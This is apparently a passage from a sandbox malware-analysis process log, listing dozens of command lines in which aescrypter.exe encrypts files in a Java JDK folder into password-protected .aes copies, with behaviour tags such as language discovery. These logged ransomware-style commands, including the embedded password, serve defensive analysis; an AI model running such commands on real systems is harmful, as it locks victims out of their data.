  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2060
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:980
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:320
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1636
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:744
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2500
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1724
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2492
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2220
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2080
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2216
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2124
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2964
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1900
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2756
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2852
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2872
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\alert_obj.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1896
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3068
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2656
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2780
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1128
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1480
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1108
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1672
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1444
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\dragHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:840
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2904
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macGrey.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:276
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1684
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1244
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:3040
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2288
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2528
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2144
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winClassicTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2280
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:772
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1204
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1568
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1668
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2456
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\THIRDPARTYLICENSEREADME.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1104
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-core.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:1752
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-options-api.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:572
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-netbeans-modules-queries.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2508
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2072
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:976
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-filesystems.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:992
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-loaders.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2532
- C:\ProgramData\local\aescrypter.exe
  "\ProgramData\local\aescrypter.exe" a "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml.aes" "C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-modules.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
  2⤵
  PID:2164
- C:\ProgramData\local\aescrypter.exe
